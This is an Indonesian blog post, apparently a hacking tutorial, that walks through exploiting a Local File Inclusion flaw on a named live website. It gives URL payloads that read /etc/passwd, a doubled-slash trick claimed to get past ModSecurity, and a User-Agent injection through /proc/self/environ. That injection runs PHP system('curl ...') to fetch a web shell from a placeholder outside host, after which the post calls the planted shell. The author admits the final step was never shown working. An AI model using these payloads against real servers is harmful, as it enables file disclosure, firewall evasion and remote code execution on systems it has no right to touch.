![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiee7ILClfM8RXs42wUTLZolGh5SyAH0zQ-__OHGc5nu441sIt19BahyphenhyphenU8Qb9F-9DjupWUOYkJ2SPJZfXlX_Dm2-643AKuTdVwvCW91ZI16xsffSBUHMZO4T0haNlX6JKMnOWN3EnUJLg/w640-h336/local-file-inclusion-vulnerability.jpg)
Local File Inclusion (LFI) adalah kerentanan yang sering ditemukan dalam aplikasi web yang ditulis dengan buruk. Kerentanan ini terjadi ketika aplikasi web memungkinkan pengguna untuk mengirimkan input ke file atau mengupload file ke server. LFI juga merupakan kerentanan akibat kesalahn validasi variabel GBPCS dengan fungsi inclution pada PHP.Namun LFI memanfaatkan logika penyerangan Directory Traversal Attack sehingga dapat menyebabkan tereksekusinya file yang tidak semestinya tereksekusi
Langsung saja kita coba mempraktekan LFI nya disini saya gunakan live target website yang sengaja saya buat agar rentan terhadap LFI.
Live : https://dentalmidia.com/
Nah disitu adal 3 pilihan page 1,page 2,dan page 3.Saya coba cek di Page 1 langsung klik
Url nya : https://dentalmidia.com/index.php?page=page1.phpUrl diatas kita akan mencoba tes kerentanan LFI dengan mengganti nilai page= nya menjadi /etc/passwd seperti ini
https://dentalmidia.com/index.php?page=/etc/passwd
oww ada Mod_Security kita perlu membypass nya dengan cara menambahkan 1 garismiring lagi seperti ini
https://dentalmidia.com/index.php?page=//etc/passwd
https://dentalmidia.com/index.php?page=//etc/passwd
Dan berhasil. Pada contoh di atas, seorang penyerang bisa mendapatkan konten dari file / etc / passwd yang berisi daftar pengguna di server. Demikian pula, penyerang dapat memanfaatkan kerentanan Direktori Traversal untuk mengakses file log (misalnya, Apache access.log atau error.log).
Kita lanjut dengan upload shell dengan menggunakan Burp Suite
Aktifkan BurpSuite, pada url ketikkan https://dentalmidia.com/index.php?page=//proc/self/environ dan lihat di burp suite send to repeater lalu di user-agent ubah menjadi <?system('curl https://lilnkshellkalian.com -o shell.php') dan send tinggal panggil shell nya https://dentalmidia.com/shell.php
Gabisa dipraktekin karena error 502 terus,jadi bisa coba sendiri,atau di lfi nya di collab in sama payload bug lain.Maap gabisa dipraktekin cuman bisa ngasi gambaran.
~Makasi
~Makasi
0 Komentar